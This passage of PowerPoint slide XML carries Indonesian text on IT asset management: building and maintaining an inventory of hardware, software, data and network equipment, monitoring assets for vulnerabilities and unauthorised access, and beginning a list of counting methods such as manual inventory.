              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencacahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghitungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Inventarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Manual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
